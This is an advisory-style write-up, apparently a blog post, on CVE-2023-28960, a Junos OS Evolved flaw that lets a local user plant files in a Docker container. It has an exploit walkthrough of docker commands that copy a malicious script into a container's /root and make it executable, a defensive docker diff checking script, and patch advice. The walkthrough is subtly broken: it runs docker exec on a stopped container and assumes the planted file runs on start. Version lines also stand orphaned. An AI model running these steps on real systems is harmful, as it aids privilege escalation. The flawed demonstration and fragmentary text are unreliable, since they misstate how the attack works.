A recently discovered vulnerability in Juniper Networks Junos OS Evolved, designated CVE-2023-28960, lets a local, authenticated, low-privileged attacker copy potentially malicious files into an existing Docker container on the local system. If an administrator later starts that Docker container, the malicious files are executed as root, compromising the system's security. The vulnerability only affects systems with Docker configured and enabled; Docker is not enabled by default, and systems where Docker has not been started are not susceptible to this issue.
21.4 versions prior to 21.4R2-EVO.
Please note that Juniper Networks Junos OS Evolved versions prior to 19.2R1-EVO are not affected by this vulnerability.
Exploit Details
Given that the vulnerability allows a local attacker to copy malicious files into a Docker container, an attacker could leverage this flaw to escalate their privileges by executing arbitrary code as root, potentially gaining full control over the system.
A low-privileged attacker finds an existing Docker container on the system
$ docker ps -a
CONTAINER ID   IMAGE              COMMAND       CREATED       STATUS                  PORTS   NAMES
17abcf3b3df8   vulnerable_image   "/bin/bash"   5 hours ago   Exited () 3 hours ago           vulnerable_container
The attacker copies a malicious file into the container
$ docker cp /tmp/malicious_file.sh vulnerable_container:/root/malicious_file.sh
The attacker ensures that the malicious file is executable
$ docker exec vulnerable_container chmod +x /root/malicious_file.sh
When the administrator inadvertently starts the Docker container, the malicious file is executed
$ docker start vulnerable_container
21.4R2-EVO for 21.4 versions.
Administrators should update their Junos OS Evolved installations to the appropriate fixed releases. These updates are available from Juniper Networks' Support Website.
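A check an administrator could run before starting a stopped container, given here as an added example (it is not from Juniper's advisory or from this page's source): it parses `docker diff` output, which lists paths added (A), changed (C) or deleted (D) relative to the container's image, and reports additions and changes outside an allowlist. The function name, the allowlist and the sample input are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: list unexpected filesystem drift in a stopped container.
# `docker diff <container>` prints "A <path>" (added), "C <path>" (changed)
# or "D <path>" (deleted) relative to the container's image.

# Assumption: path prefixes where writes are expected for this container.
ALLOWED_PREFIXES="/var/log/ /tmp/"

# Reads `docker diff` output on stdin and prints every added or changed path
# outside ALLOWED_PREFIXES. Returns 1 if anything was printed, 0 otherwise.
flag_unexpected_changes() {
    flagged=0
    while IFS= read -r line; do
        kind=${line%% *}   # first field: A, C or D
        path=${line#* }    # rest of the line (paths may contain spaces)
        case "$kind" in
            A|C) ;;            # additions and changes are what we review
            *) continue ;;     # deletions and blank lines are skipped
        esac
        allowed=0
        for prefix in $ALLOWED_PREFIXES; do
            # Append "/" so the directory entry "/tmp" matches prefix "/tmp/".
            case "$path/" in
                "$prefix"*) allowed=1 ;;
            esac
        done
        if [ "$allowed" -eq 0 ]; then
            printf '%s %s\n' "$kind" "$path"
            flagged=1
        fi
    done
    return "$flagged"
}

# Constructed sample of `docker diff vulnerable_container` output.
SAMPLE_DIFF='C /root
A /root/malicious_file.sh
C /var/log
A /var/log/app.log
C /tmp
D /tmp/old.cache'

# Live use: docker diff vulnerable_container | flag_unexpected_changes
printf '%s\n' "$SAMPLE_DIFF" | flag_unexpected_changes ||
    echo "unexpected changes found: review before 'docker start'"
```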
Original References
For more information on this vulnerability, refer to the Juniper Networks Security Advisory and the CVE-2023-28960 entry in the National Vulnerability Database.
Conclusion
CVE-2023-28960 is a significant vulnerability for systems with Docker configured and enabled in Juniper Networks Junos OS Evolved. Ensuring your installations are updated to the appropriate fixed releases is crucial to maintain secure operations. Stay apprised of updates and recommended practices by following Juniper Networks Security Advisories and the National Vulnerability Database.
Timeline
Published on: 04/17/2023 22:15:00 UTC
Last modified on: 04/18/2023 03:15:00 UTC